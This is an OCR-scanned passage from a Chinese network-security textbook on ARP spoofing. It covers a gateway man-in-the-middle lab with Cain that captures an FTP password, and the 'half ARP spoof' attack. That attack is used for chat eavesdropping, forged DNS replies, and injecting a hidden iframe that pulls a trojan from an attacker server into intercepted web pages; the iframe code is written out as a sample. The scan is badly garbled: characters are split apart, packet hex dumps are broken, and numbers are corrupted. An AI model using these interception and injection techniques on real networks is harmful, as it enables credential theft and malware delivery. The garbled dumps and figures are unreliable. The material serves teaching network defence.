00000270: 69 65 6c 64 2e|79 3d 38 ield.y=8 
be password=86982480 


己 
己 
S 
己 
S 
局 
公 
se 
~ 
ND 
~ 
加 
名 
所 
回 


图 4-42 本 机 转发 给 Windows 2000 虚拟 机 的 登录 报 文 


4.6 利用 网 关 实 施 的 ARP 欺骗 


网 关 位 于 内 部 网 络 的 出 口 位 置 ,进出 内 部 网 络 的 数据 都 要 经 过 网 关中 转 。 为 了 产生 
更 大 的 攻击 效果 ,通常 情况 下 攻击 者 会 将 内 部 网 络 的 特定 主机 和 网 关 作为 攻击 目标 ,这 样 
一 来 特定 主机 与 外 网 的 通信 数据 都 要 经 过 攻击 者 中 转 , 攻 击 者 可 以 截获 更 多 有 价值 的 数 
据 , 可 以 实现 更 多 的 攻击 目的 。 

下 面 以 图 4-43 为 例 说 明 利 用 网 关 实 施 的 ARP 欺骗 。 “中间人 ”首先 利用 ARP 欺骗 
攻击 网 关 和 受害 者 主机 ,使 得 网 关 的 缓存 表 中 受害 者 的 IP 映射 为 "中间人 ?的 MAC ,受害 
者 的 缓存 表 中 网 关 的 IP 也 映射 为 “中间人 ”的 MAC。 这 样 一 来 ,受害 者 与 外 网 主机 之 间 
的 通信 数据 会 经 过 “中 间 人 ”中 转 。 


外 部 主机 
因特网 受害 者 ARP 缓 存 表 
Nm、 网 关 IP- 中 间 人 MAC 
AS 
~、 内 部 网 络 [Dj 
网 关 ~、、、 -二 受害 
网 关 的 AR 级 存 才 ~、 人、、、、 pe 
受害 者 IP- 中 间 人 MAC y= Ei 
中 间 人 


图 4-43 利用 网 关 实 施 的 ARP 欺骗 


训练 : 利用 针对 网 关 实施 的 ARP 欺骗 攻击 监听 内 部 主机 与 外 部 主机 的 FTP 通信 数 
据 。 实 验 步骤 如 下 。 

第 一 步 : 按 图 4-44 组 建 网 络 并 配置 IP 和 MAC 地 址 。 

为 了 便于 分 析 网 络 数据 ,这 里 需要 手工 配置 接口 的 MAC 地 址 。Windows 2000 虚拟 
机 2 的 网 关 设 置 为 202.1.1.1,Windows XP 虚拟 机 和 本 机 的 网 关 设 置 为 192. 3. 3.1。 使 
用 ping 命令 测试 网 络 连通 情况 。 

第 二 步 : 在 Windows 2000 虚拟 机 1 上 开启 NAT 地 址 转换 功能 。 
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网 络 安全 基础 


Windows 2000 虚 拟 机 2 ”202.1.1.10 


(FTP 服 务 器 ) e0-e0-e0-e0-e0-e0 受害 者 ARP 缓 存 表 
a 192.3.3.1 b0-b0-b0-b0-b0-b0 
192.3.3.3 
192.3.3.1 
202.1.1.1 -c0-c0-c0-c0- 
d0-d0-d0-d0-d0-d0 “~~ 人 ee 
192.3.3.0 2 
Windows 2000 虚 拟 机 1 Windows XP 虚拟 机 
(NAT 网 关 ) (受害 者 ) 
网 关 的 ARP 缓 存 表 192.3.3.2 
192.3.3.3 b0-b0-b0-b0-b0-b0 pb0:bO-bO:b0-b0:bO 
本 机 
(中 间 人 ) 


图 4-44 网 络 拓扑 


为 了 模拟 真实 的 网 络 环境 ,我们 在 Windows 2000 虚拟 机 1 上 开启 NAT 地 址 转换 功 


选择 协议 ” 


I 下 : 在 路 由 与 远程 访问 页 面 选 中 “IP 路 由 选择 ”> 右 击 “常规 ”一 选择 “新 路 由 


> 选中 “网 络 地 址 转换 (NAT)” 一 单 击 “ 确 定 ” 按 钮 。 至 此 NAT 协议 添加 完成 ， 


接 下 来 要 添加 内 、 外 网 接口 。 


先 添 力 
192. 8. 3.1 
按钮 。 


再 添 力 
202.. 1..1,1 
TCP/UDP 


内 网 接口 , 右 击 “网 络 地 址 转换 (NAT)” 一 选择 “新 接口 ”一 选中 IP 地 址 为 
的 网 卡 一 单 击 “ 确 定 ? 按 钮 一 选中 “专用 接口 连接 到 专用 网 络 ” 一 单 击 “ 确 定 ” 
外 网 接口 , 右 击 “* 网 络 地 址 转换 (NAT)” 一 选择 “新 接口 ?一 选中 IP 地 址 为 
的 网 卡 一 单 击 “ 确 定 ? 按 钮 一 选中 “公用 接口 连接 到 Internet” 习 选中 “转换 


头 ”> 单 击 “确定 "按钮 。 


NAT 转换 配置 好 后 在 Windows XP 虚拟 机 上 执行 ping 202. 1. 1. 2 命令 ,结果 如 
图 4-45 所 示 ,证 明 网 络 连 通 正常 。 


C: WINDOWS\systea32\Vcad exe -|D|x| 


C:\Documents and Settings\You>ping 292.1.1.2 


Pinging 202.1.1.2 with 32 bytes of data: 


Reply from 202.1.1.2: bytes=32 time=:10ms TTL=127 
Reply from 202.1.1.2: bytes:32 time=:1ms TTLz127 
Reply from 202.1.1.2: bytes:32 time<ims TTLz127 
Reply from 202.1.1.2: butes=32 time<ims TTL:=127 


Ping statistics for 202.1.1.2: 

Packets: Sent =: 4, Received : 4, Lost =: 9 (9X loss| 
Approximate round trip times in milli-seconds: 

Minimum = Oms, Maximum = 10ms, Average = 2ms 


图 4-45 网 络 连通 正常 


网 关 在 将 内 部 网 络 数据 向 外 网 转发 前 ,会 将 IP 数据 报 的 源 IP 地 址 ( 即 专用 地 址 ) 转 
换 为 全 局 合法 地 址 202. 1. 1.1( 即 网 关外 网 接口 的 IP 地 址 )。 同 样 ,网 关 在 将 外 网 数据 向 
内 网 转发 前 ,也 会 将 数据 报 的 目的 地 址 ( 即 全 局 合法 地 址 202. 1. 1. 1) 转 换 为 内 网 使 用 的 


专用 地 址 。 
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图 4-46 是 Windows XP 虚拟 机 与 外 部 主机 使 用 ping 命令 通信 的 数据 截图 。 


第 4 章 ARP 及 ARP 坎 骗 


可 见 Windows XP 虚拟 机 首先 将 数据 发 送 给 网 关 , 此 时 源 IP 地 址 是 192. 3. 3. 3。 接 下 来 
网 关 将 数据 报 转发 给 外 部 主机 ,此 时 源 IP 地 址 已 经 变换 为 全 局 地 址 202. 1. 1. 1。 外 部 主 
机 先 将 返回 数据 发 送 给 网 关 , 此 时 目的 IP 为 全 局 地 址 202. 1. 1. 1。 网 关 再 将 数据 转发 给 
内 部 主机 ,此 时 目的 IP 已 变换 为 专用 地 址 192. 3. 3. 3。 


ETIm 


图 4-46 使 用 Sniffer Pro 捕获 的 数据 截图 


第 三 步 : 在 Windows 2000 虚拟 机 2 上 安装 FTP 服务 器 。 

在 Windows 2000 虚拟 机 2 上 安装 FTP 服务 器 Serv-U, 配 置 FTP 服务 器 禁止 匿名 
访问 ,创建 用 户 jack、 密 码 86982481, 将 用 户 jack 的 主 目录 指定 在 C 盘 ( 具 体 步 又 略 ) 。 

在 Windows XP 虚拟 机 上 访问 FTP 服务 器 ,测试 文件 上 传 、 下 载 功能 。 

第 四 步 : 在 本 机 使 用 cain 对 网 关 和 Windows XP 虚拟 机 发 起 ARP 欺骗 攻击 。 

在 本 机 使 用 cain 对 网 关 和 Windows XP 虚拟 机 发 起 ARP 欺骗 攻击 (具体 步骤 略 ) 。 
图 4-47 给 出 的 是 攻击 前 后 Windows XP 虚拟 机 的 缓存 表 , 可 见 网 关 的 IP 地 址 被 错误 地 
映射 为 攻击 者 (本 机 ) 的 MAC 地 址 。 这 样 一 来 ,Windows XP 虚拟 机 发 给 网 关 的 数据 报 
将 被 提交 给 本 机 。 


ot C:\WINDOYS\systen32\cad. exe |-Ie|x| 
C:\Documents and SettingsNYou>arp -a 


Interface: 192.3.3.3 --- OQx30003 
Internet Address Physical Address Type 
192.3.3.1 ag9-ag-ag-ag0-ag0-ag0 dynamic 攻击 前 
192.3.3.2 ba-b6-bo-bo-bo-bd dynamic 文 而 前 


C:\Documents and SettingsNYou>arp -a 


Interface: 192.3.3.3 --- OQx30003 
Internet Address Physical hddress Type 
192.3.3.1 b9-b9g-b9-b9-b9-b9 dunamic ce 
192.3.3.2 b6-b5-b5-b6-b6-b5 dynamic 攻击 后 


图 4-47 攻击 前 后 Windows XP 虚拟 机 的 缓存 表 


图 4-48 给 出 的 是 攻击 前 后 网 关 的 缓存 表 , 可 见 Windows XP 虚拟 机 的 IP 地 址 也 被 
错误 地 映射 为 攻击 者 (本 机 ) 的 MAC 地 址 。 这 样 一 来 ,网 关 转 发 给 Windows XP 虚拟 机 
的 数据 报 将 被 提交 给 本 机 。 

至 此 本 机 成 为 网 关 和 Windows XP 虚拟 机 通信 的 “中 间 人 ”, Windows XP 虚拟 机 与 
外 网 FTP 服务 器 之 间 的 通信 数据 都 要 经 过 本 机 中 转 , 本 机 可 以 从 中 提取 出 敏感 信息 。 
图 4-49 为 cain 截获 的 FTP 账户 信息 。 

第 五 步 : 使 用 Sniffer Pro 捕获 ,分 析 通 信和 数据 。 

使 用 Sniffer Pro 捕获 通信 数据 可 以 清晰 地 看 到 通信 数据 的 转发 流程 。 下 面 以 
Windows XP 虚拟 机 发 出 的 密码 报 文 为 例 分 析 数 据 的 转发 流程 。 首 先 Windows XP 虚拟 
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INNT\System32\cmd.exe 


Documents and Settings\Administrator>arp -a 
Interface: 192.3.3.1 on Interface OQx?000003 
Internet Address Physical Address Type 
192.3.3.3 c9-c9-cg9-c9-c9-c9 dynamic ea 
Y 一 一 攻击 前 
C:\Documents and Settings\Administrator>arp -a 
Interface: 192.3.3.1 on Interface Ox?000003 
Internet hddress Physical hddress Type 
192.3.3.2 bg9-b9-b9g-b9-b9-b9 dynamic 
92.3.3.3 bg9-b9-b9-b9-b9-b9 dynamic 攻击 后 
[al 
图 4-48 攻击 前 后 网 关 的 缓存 表 
加 [=] E3 
Ele Yew Configure Tools Help Ee 
ETE ER 
多 Decoders [BS Network [3 Sniffer [了 Gader [Traceroute [而 ccou 
Passwords 宏 
Sm 192.3.3.3 _ iack 86982481 
山 急 FTP 帐 户 信息 
rosts [® sr [$ Routing |] 从 Passwords [sr 
Lost packets; 0% 
图 4-49 ”cain 截获 的 账户 信息 
源 IP:15 
目的 MAC: 本 机 源 MAC: XP 虚拟 机 目的 IP:202. 1. 1. 2 
0000000: b0_b0 b0|b0 bo b0 c0_c0 eoleo c0_c0 0| 鞍 鞍 鞍 览 览 览 ..E 
0000010 85 c0 0 7 .26 ft ? 
0000020 : 
0000030 : 
0000040 : 
源 端 口 : 1182 


的 端口 :21 


图 4-50 ”Windows XP 虚拟 机 发 给 "中间人 ”的 密码 报 文 


如 图 4-51 所 示 ,“ 中 间 人 ”从 密码 报 文中 提取 出 账户 密码 86982481, 随 后 将 报 文 转发 
给 网 关 , 注 意 此 时 源 IP 地 址 仍 为 192. 3. 3. 3。 


源 IP: 192. 3. 3.3 
目的 MAC: 网 关 海 MAC- 本 机 目的 IP:202. 1. 1 2 
0 a0 an bo bo bo| 00 


00000000 : 
00000010: 
00000020: 
00000030 
00000040: 


图 4-51 “中 间 人 ”转发 给 网 关 的 密码 报 文 


网 关 将 密码 报 文 转发 至 外 网 , 见 图 4-52。 此 时 报 文 的 源 IP 地 址 已 经 转换 为 全 局 地 址 
202. 71, 1 
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庆 IP:202. 1. 1.1 
目的 MAC:FTP 服 务 器 源 MAC: 网 关 的 外 网 接口 目的 IP:202. 1.1.2 
2 el e0 e0|e0 e0 e0 d0 d0 d0|d0 d0 d0 08|00 45 00 ec - 
2@.1 


0000010: 00 37 06 32 40 00 7f 06 Sf 89 ca 01 01|01 
0000020: 01 02 04 9e 00 15 a0 Sb 87 09 9b d4 18 38 50 3 ?. 糙 ?水 .8 
0000030: fa 9b 9d[79 00100 50 41 53 53 20 38 36 39 38 32 过 谢 : PASS e082 
0000040: 34 38 31|0d 0a 
条 端口 :1182 
目的 端口 :21 


图 4-52 网 关 转 发 给 FTP 服务 器 的 密码 报 文 


而 。 针对 网 关 实 施 half ARP spoof 攻击 


47.1 针对 网 关 实 施 half ARP spoof 攻击 的 基本 原理 


ARP 欺骗 给 局 域 网 的 安全 管理 工作 造成 了 严重 的 危害 , 断 网 、 汇 密 和 挂 马 事件 时 有 
发 生 。 为 了 预防 ARP 欺骗 ,局 域 网 管理 员 通 常会 在 每 台 主 机 上 预先 绑 定 网 关 的 IP 地 址 
和 MAC 地 址 ,这 种 方法 确实 在 一 定 程度 上 保护 了 局 域 网 安全 , 断 网 等 事件 不 在 发 生 。 但 
网 络 并 没有 彻底 安全 , 仍 面临 着 half ARP spoof 攻击 威胁 ,下 面 将 对 这 种 攻击 进行 深入 
分 析 。 

为 了 防御 针对 网 关 实 施 的 ARP 欺骗 攻击 ,通常 局 域 网 管理 员 会 在 主机 端 进行 静态 
地 址 绑 定 , 以 图 4-53 为 例 , 在 主机 1 的 ARP 缓存 表 中 添加 一 条 静态 绑 定 记录 ,将 网 关 的 
IP( 内 网 接口 的 IP 地 址 ) 映 射 为 正确 的 MAC( 内 网 接口 的 MAC 地 址 )。 这 样 一 来 ,主机 1 
在 受到 ARP 欺骗 时 不 会 产生 错误 的 网 关 IP 和 MAC 映射 关系 。 这 种 措施 可 以 在 一 定 程 
度 上 防御 ARP 欺骗 攻击 ,但 是 针对 网 关 实 施 的 half ARP spoof 攻击 仍然 可 以 突破 这 种 
防御 ,对 网 络 发 起 攻击 。 

以 图 4-53 为 例 , 由 于 主机 1 预先 绑 定 了 网 关 的 IP 和 MAC, 因 此 黑客 对 主机 1 的 
ARP 欺骗 没 有 成 功 , 但 对 网 关 的 ARP 欺骗 成 功 进行 了 ,攻击 导致 网 关 的 ARP 缓存 表 中 
主机 1 的 JIP 映射 为 “中间 人 ?的 MAC。 下 面具 体 分 析 这 种 攻击 带 来 的 结果 。 


外 部 主机 2 
“ 受害 者 ARP 缓 存 表 
特 网 网 关 IP- 网 关 MAC-static 
"We 
:| 
二 1 
网 关 的 ARP 缓 存 表 网 关 主机 


主机 1IP- 中 间 人 MAC-dynamic | 


中 间 人 
图 4-53 针对 网 关 实 施 half ARP spoof 攻击 


由 于 主机 1 未 受到 ARP 欺骗 攻击 ,因此 主机 1 发 给 因特网 的 通信 数据 正常 提交 给 网 
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关 , 由 网 关 向 外 界 转发 。 当 因特网 返回 的 数据 到 达 网 关 时 ,由 于 网 关 的 ARP 缓存 表 记 录 
的 是 错误 的 映射 关系 ,网 关 误 将 黑客 的 MAC 地 址 当 作 主 机 1 的 MAC 地 址 ,因此 返回 数 
据 被 提交 给 黑客 。 黑 客 可 以 恶意 修改 返回 数据 或 从 中 提取 出 敏感 信息 ,然后 将 返回 数据 
转发 给 主机 1。 整 个 攻击 过 程 主机 1 没有 任何 察觉 ,发 出 的 数据 正常 经 过 网 关 转 发 ,但 返 
回 数据 要 经 过 黑客 主机 中 转 , 这 就 是 针对 网 关 实 施 的 half ARP spoof 攻击 。 通 过 分 析 发 
现 ,主机 1 端 虽然 进行 了 静态 地 址 绑 定 ,但 half ARP spoof 攻击 仍然 可 以 实施 。 


472 针对 网 关 实 施 half ARP spoof 攻击 的 危害 


利用 half ARP spoof 攻击 可 以 达到 以 下 目的 : 四 信息 窃取 ,黑客 可 以 从 中 转 的 通信 
数据 中 提取 出 敏感 信息 ,例如 用 户 的 邮件 内 容 、 聊 天 信息 ,等 等 , @DNS 欺骗 ,攻击 者 修 
0 响应 报 文 的 IP 地 址 ,将 用 户 引导 至 某 个 恶意 站 点 ,这 个 站 点 可 能 含有 木马 ,病毒 、 

广告 等 有 害 信息 ; @ 信 息 自 改 , 信 息 算 改 就 是 在 一 次 正常 的 通信 过 程 中 ,入 侵 者 作为 
第 = - 了 到 其 中 ,人 侵 者 可 以 冒充 一 方 主机 , 插 和 会话, 传送 算 改 后 的 数据 。 下 面 举例 
分 析 half ARP spoof 攻击 导致 的 危害 。 

第 一 种 危害 : 监听 即时 通信 。 

以 图 4-53 为 例 , 主 机 1 与 主机 2 通过 MSN 进行 聊天 。 黑 客 对 网 关 实 施 了 half ARP 
spoof 攻击 ,进而 可 以 监听 主机 2 返回 给 主机 1 的 MSN 通信 数据 。 图 4-54 是 黑客 截获 的 
MSN 通信 报 文 。 该 报 文 的 源 MAC 地 址 (00-0c-29-d9-48-90) 是 网 关 的 MAC 地 址 ,目的 
MAC(00-0f-e2-le-3a-d0) 是 黑客 的 MAC 地 址 ,这 使 得 该 报 文 能 够 被 交换 机 正常 转发 给 黑 
客 。 报 文 的 源 IP 地 址 (207. 46. 26. 103) 是 MSN 服务 器 的 IP, 目 的 IP(192. 168. 0. 1) 是 主 
机 1 的 IP, 从 图 4-54 可知 ,该 报 文 传输 的 聊天 内 容 是 “hello”。 


00000000: 00 of e2 le 3ad0 00 0c 29 d9 48 90 08 00 45 a ?:9? ) 贱 ? 
00 b9 5e a8 40 00 80 06 fl 57 cf 2e la 67 c0 a8 


: 00 01 04 c2 07 47 e6 eb e6 e2 a8 4c ef 65 50 18 

: ff 18 87 ee 00 00 4d 53 47 20 33 36 20 4e 20 31 

: 33 31 0d 0a 4d 49 4d 45 2d 56 65 72 73 69 6f 6e 31..MIME-Version 
3a 20 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 1.0..Content-T 

: 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b ype: text/plain; 


: 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a charset=UTF-8 
: 58 2d 4d 4d 53 2d 49 4d 2d 46 6f 72 6d 61 74 3a X-MMS-INM-Format: 
: 20 46 de 3d 25 45 35 25 41 45 25 38 42 25 45 34 FN=%E5%AE%8B%E4 
25 42 44 25 39 33 3b 20 45 46 3d 3b 20 43 4f 3d XBDX93; EF=; CO= 
: 30 3b 20 43 53 3d 38 36 3b 20 50 46 3d 30 0d 0a 0; CS=86; PF=0 
000000c0: 0d 0a 68 65 6c 6c 6f hello 


图 4-54 黑客 截获 的 MSN 通信 报 文 


黑客 监听 到 通信 内 容 后 会 重新 封装 、 转 发 这 个 报 文 ,转发 出 的 报 文 如 图 4-55 所 示 。 
报 文 只 是 源 和 目的 MAC 地 址 进行 了 修改 ,其 他 字 节 没有 任何 改变 。 源 MAC 地 址 (00- 
0f-e2-le-3a-d0) 是 黑客 主机 的 MAC 地 址 ,这 样 可 以 保证 交换 机 的 地 址 表 不 会 受到 破坏 ， 
目的 MAC(00-09-73-4c-2e-98) 是 主机 1 的 MAC 地 址 ,这 样 主机 1 可 以 接收 到 这 个 报 文 。 
在 主机 1 没有 任何 察觉 的 情况 下 ,因特网 好 友 发 给 他 的 聊天 信息 被 黑客 监听 了 。 

第 二 种 危害 : DNS 欺骗 攻击 。 

正常 情况 下 ,主机 1 访问 新 浪 网 站 时 ,会 向 指定 的 DNS 服务 器 提交 一 个 域名 解析 请 
求 报 文 ,请求 解析 域名 www. sina. com. cn 对 应 的 IP 地 址 ,DNS 服务 器 会 将 解析 出 的 新 
浪 服务 器 IP 地 址 通过 一 个 DNS 应 答 报 文 返回 给 主机 1; 而 后 主机 1 使 用 这 个 IP 地 址 访 
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00000000: 00 09 ?73 4c 2e 98 Bo be 3 中 3a do 人 00 45 二 3 E 
0 00 6 y 


. 驮 ? ,g 括 
00000020: 00 01 04 c2 07 47 最 吕 a 2 a8 4c 苹 65 50 38 2G 蝶 哩 周 P 
00000030: ff 18 87 ee 00 00 4d 53 47 20 33 36 20 4e 20 31 .图 .MSG 36 NHN1 
00000040: 33 31 0d oa 4d 49 4d 45 2d 56 65 72 73 69 6f 6e 31..MINE-Version 
00000050: 3a 20 31 2e 30 ud Qa 43 6f 6e 74 65 6e 74 2d 54 : 1.0..Content-T 
00000060: 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b ype: text/plain; 
00000070: 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a charset=UTF-8. 
00000080: 58 2d 4d 4d 53 2d 49 4d 2d 46 6f 72 6d 61 74 3a X-MMS-IM-Format: 
00000090: 20 46 4e 3d 25 45 35 25 41 45 25 38 42 25 45 34 FN= ESXAEXOBXEA 


000000b0: 30 3b 20 43 53 3d 38 
000000c0: 0d 0a 68 65 6c 6c 6f 


图 4-55 黑客 转发 出 的 报 文 


问 新 浪 网 站 , 即 可 浏览 到 请 求 的 网 页 。 

主机 1 发 出 的 DNS 请 求 报 文 可 以 经 过 网 关 正常 提交 给 DNS 服务 器 。 由 于 网 关 受 到 
half ARP spoof 攻击 ,导致 DNS 服务 器 返回 的 应 答 报 文 会 被 黑客 截获 。 图 4-56 是 黑客 
截获 的 DNS 应 答 报 文 。 该 数据 报 的 目的 MAC 地 址 (1 一 6 字 节 ) 是 黑客 主机 的 MAC 地 
址 , 源 MAC 地 址 (7 一 12 字 节 ) 是 网 关 的 MAC 地 址 ,这 使 得 该 报 文 能 够 被 交换 机 正常 转 
发 给 黑客 。 报 文 的 源 IP 地 址 (27 一 30 字 节 ) 是 DNS 服务 器 的 IP(210. 47. 128. 135) ,目的 
IP(31 一 34 字 节 ) 是 主机 1 的 IP(192. 168.0.1)。 从 这 个 DNS 应 答 报 文 可 以 得 知 ,新 浪 服 
务 器 具有 一 个 正式 域名 www. sina. com. cn、 两 个 别名 jupiter. sina. com. cn 和 libra. sina. 
com. cn ,新 浪 服务 器 对 应 的 IP 地 址 为 202. 108. 33. 32( 最 后 4 个 字 节 ) 。 


00000000 : 0c 29 d9 ?3:3.) 贬 ? E 
00000010 0 2 2 0 VZ? .1. 约 X 展 1 
00000020 2 1 5 c5 瑟 


00000030 : WWW. Sina 
00000040 : Com . Cn 半 


00000050: 0 jupiterl 
00000060 .2 li 
00000070: bra? 缚 .. .2 
00000080 : 总 ! 


图 4-56 黑客 截获 的 DNS 应 答 报 文 


黑客 修改 DNS 应 答 报 文中 新 浪 服务 器 的 IP 地 址 ,而 后 重新 封装 、 转 发 这 个 报 文 。 
图 4-57 是 黑客 转发 出 的 数据 报 。 该 数据 报 的 目的 MAC 地 址 (1 一 6 字 节 ) 被 改 为 主机 1 
的 MAC 地址 , 源 MAC 地 址 被 改 为 黑客 主机 的 MAC 地 址 (7 一 12 字 节 ) ,新 浪 服务 器 的 
正确 IP 地 址 (最 后 4 个 字 节 ) 被 改 为 210. 47. 128.1。 主 机 1 收 到 这 个 被 修改 过 的 DNS 应 
答 报 文 后 ,会 将 210. 47. 128. 1 误 认 为 是 新 浪 服务 器 的 正确 IP, 而 在 这 个 IP 地 址 上 运行 
的 可 能 是 一 个 钓鱼 网 站 ,或 者 是 一 个 含有 病毒 和 木马 程序 的 恶意 站 点 。 主 机 1 将 被 误导 
至 该 站 点 ,从 而 使 自己 面临 密码 泄漏 .被 种 植木 马 等 风险 。 


00000000: 00 09 73 4c 2e 98 00 0f e2 le 3a d0 08 00 45 00 sL.?.3:3 E 
00000010: 00 77 Sa di 00 00 7f 11 cd 44 d2 2f 80 87 c0 a8 .YZ?.1. 昂 展 1 
00000020: 00 01 00 35 04 Sf 00 63 90 b? 00 02 81 80 00 01 5._.c 慑 . .和 专 
00000030: 00 03 00 00 00 00 03 77 77 77 04 73 69 6e 61 03 . Www .Sina 
00000040: 63 6f 6d 02 63 6e 00 00 01 00 01 c0 Oc 00 05 00 conm.cn.. 了?. 
00000050: 01 00 00 00 Ob 00 0a 07 6a ?5 70 69 74 65 72 c0 . .Jupiter 
00000060: 10 c0 2d 00 05 00 01 00 00 00 32 00 08 05 6c 69 .? 2 1 
00000070: 62 72 61 c0 10 c0 43 00 01 00 01 00 00 00 32 00 bza? 缚 2 
00000080: 04 d2 2f 82 01 


图 4-57 黑客 转发 的 DNS 应 答 报 文 


第 三 种 危害 : 种 植 网 页 木马 。 
用 户 在 访问 网 站 时 ,通常 是 先进 入 网 站 的 主页 ,然后 再 通过 主页 上 的 链接 进入 到 自己 


87 


ED 网 络 安全 基础 ”gl 


感 兴趣 的 页 面 。 因 此 ,主页 是 访问 频率 最 高 的 页 面 ,黑客 为 了 达到 快速 传播 木马 的 目的 ， 

通常 选择 主页 作为 挂 马 的 对 象 

下 面 给 出 一 个 典型 的 挂 马 代 码 , 将 这 名 代码 加 入 到 被 挂 马 网 站 的 主页 文件 (例如 
index. asp) 的 任何 一 处 位 置 , 即 可 实现 网 站 挂 马 。 所 iframe src 二 "http:// 包 含 木马 程序 
的 服务 器 IP 地 址 /1. html" ;width 一 “0" height 王 "0" frameborder 一 "0" 过 二 /iframe 二 。 
这 是 一 种 框架 挂 马 方式 ,用 户 访问 index. asp 之 后 ,会 自动 到 包含 木马 程序 的 服务 器 上 下 
载 并 浏览 1. html, 这 个 1. html 会 利用 下 浏览 器 漏洞 自动 下 载 并 运行 木马 程序 (例如 
1. exe) ,由 于 这 里 将 框架 的 高 度 .宽度 和 边框 粗细 均 设 置 为 0, 因此 受害 者 在 浏览 index. 
asp 时 不 会 察觉 到 任何 变化 。 通 过 以 上 分 析 发 现 ,黑客 不 需要 将 1. html 和 1. exe 上传 到 
被 挂 马 网 站 ,只 需 修改 被 挂 马 网 站 的 主页 文件 (index. asp), 即 可 实现 网 站 挂 马 , 因 而 具备 
很 强 的 隐蔽 性 。 利 用 half ARP spoof 攻击 ,黑客 可 以 截获 Web 服务 器 返回 的 HTTP 应 
答 报 文 , 并 在 应 答 报 文中 植 人 挂 马 代 码 , 从 而 实现 网 站 挂 马 。 下 面 通过 一 个 实例 来 分 析 这 
种 攻击 。 

用 户 通 过 主机 1 访问 某 电 子 商 务 网 站 ,请 求 浏览 网 站 的 index. asp 网 页 ,图 4-58 是 主 
机 1 发 出 的 HTTP-GET 请 求 报 文 。 由 于 主机 1 静态 绑 定 了 网 关 的 IP 地 址 和 MAC 地 
址 ,因此 这 个 HTTP-GET 报 文 被 直接 提交 给 网 关 ,没有 经 过 黑客 主机 。 


00000000 可 0c 29 d9 48 90 00 02 罗 4c 2e 98 08 00 45 00 ) 始 7 oT 了 


000000b0: 31 3b 20 5 


图 4-58 用户 发 出 的 HTTP-GET 报 文 


该 数据 报 的 目的 MAC 地 址 (1 一 6 字 节 ) 是 网 关 的 MAC 地 址 , 源 MAC 地 址 (7 一 12 
字 节 ) 是 主机 1 的 MAC 地 址 。 报 文 的 源 IP 地 址 (27 一 30 字 节 ) 是 主机 1 的 IP(192. 168. 
0.1), 目 的 IP(31 一 34 字 节 ) 是 电子 商务 网 站 的 IP(202. 10. 20. 26)。 报 文 的 源 端口 号 
(35、36 字 节 ) 是 1257, 目 的 端口 号 (37、38 字 节 ) 是 HTTP 服务 的 知名 端口 80。 从 该 报 文 
可 以 得 知 , 主 机 1 以 GET 方式 请 求 电子 商务 网 站 的 index. asp 主页 ,使 用 的 是 IE 8.0 浏 
览 器 。 

由 于 网 关 受 到 了 half ARP spoof 攻击 ,在 网 关 的 ARP 缓存 表 里 主机 1 的 IP 地 址 映 
射 为 黑客 主机 的 MAC 地 址 ,因此 ,网 关 会 将 电子 商务 站 点 返回 的 HTTP 应 答 报 文 错 误 
地 提交 给 黑客 主机 。 图 4-59 是 被 黑客 截获 的 HTTP 应 答 报 文 。 

该 数据 报 的 目的 MAC 地 址 (1 一 6 字 节 ) 是 黑客 主机 的 MAC 地 址 , 源 MAC 地 址 
(7 一 12 字 节 ) 是 网 关 的 MAC 地 址 。 报 文 的 源 IP 地 址 (27 一 30 字 节 ) 是 电子 商务 网 站 的 
IP(202. 10. 20. 26) ,目的 IP(31 一 34 字 节 ) 是 主机 1 的 IP(192. 168. 0. 1) 。 该 数据 报 的 ID 
(19、20 字 节 ) 是 21 225 ,注意 这 个 字段 唯一 标识 了 一 个 IP 数据 报 。 报 文 的 源 端口 号 (35、 
36 字 节 ) 是 80, 目的 端口 号 (37、38 字 节 ) 是 1257。 报 文 的 序列 号 (39、42 字 节 ) 是 
2 145 590 149 ,这 个 字段 指明 了 应 用 层 数 据 第 一 个 字 节 的 编号 。 下 面 分 析 应 用 层 数据 ， 
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Server 字段 指明 电子 商务 网 站 使 用 的 Web 服务 器 是 IIS 5.0;Date 字段 指明 浏览 网 页 的 
时 间 是 2010-10-19 07:34:26;Content-Length 字段 指明 主页 index. asp 的 大 小 22 096 字 
节 ,注意 这 个 数字 在 挂 马 之 后 将 发 生 改 变 ; Content-Type 字段 指明 传输 的 是 HTML 文 
件 ; 从 二 html 盖 开始 是 index. asp 主页 文件 的 代码 。 


00000000 : ?3:3.) 贬 ?. 下 
00000010 : 晓 领 .6..e?.. 括 
00000020: P.?? 厂 1 九 P 
00000030 Ca[?. HTTP/1.1 2 
00000040 : 00 Ok. .Server: M 
00000050 : icrosoft-IISZ5 .0 
00000060 Date: Tue. 19 
00000070 Oct 2010 07:34:2 
00000080 : 6 GMT. Content-L 
00000090 : 6f ength: 22096. .Co 
000000a0 : ntent-TyPe: text 
000000b0 htnl . .Cache-con 
000000c0 : trol: private 
000000d0 : html1y .<head》 
000000e0 : 9 .<neta http-equi 
000000£0: v="Content-Type" 
00000100: 2 content="text/h 
00000110: 2 tml; charset=gb2 
00000120: 312”、 .ctitley 电 
00000130 : 子 商 城 </title> 


00000140: </head body 


图 4-59 被 黑客 截获 的 HTTP 应 答 报 文 


黑客 会 在 截获 的 HTTP 应 答 报 文中 植 入 挂 马 代 码 , 之 后 重新 封装 、 转 发 这 个 HTTP 
应 答 报 文 。 图 4-60 是 黑客 转发 的 HTTP 应 答 报 文 。 


icrosoft-IIS/5.0 
Date: Tue, 19 
2 Oct 2010 07:34:2 
6 GMT. .Content—L 
ength: 22184..Co 
ntent-Type: text 
html, .Cache-con 
trol: private 
‘<iframe src="ht 
tp 61. ,50 10 26 


iframe» > 
head>.. meta h 
ttp-equiv="Conte 
nt-Type” content 
="text/html; cha 
rset=gb2312">. .< 
title> 电 子 商 城 
title ‘head> 


图 4-60 黑客 转发 的 HTTP 应 答 报 文 


通过 分 析 发 现 , 该 数据 报 有 以 下 几 处 发 生 了 变化 : 目的 MAC 地 址 (1 一 6 字 节 ) 改 为 
主机 1 的 MAC 地址 ; 源 MAC 地 址 (7 一 12 字 节 ) 改 为 黑客 主机 的 MAC 地 址 ; Content- 
Length 字段 由 之 前 的 22 096 改 为 22 184, 多 出 的 88 字 节 恰好 为 黑客 植 人 index. asp 的 挂 
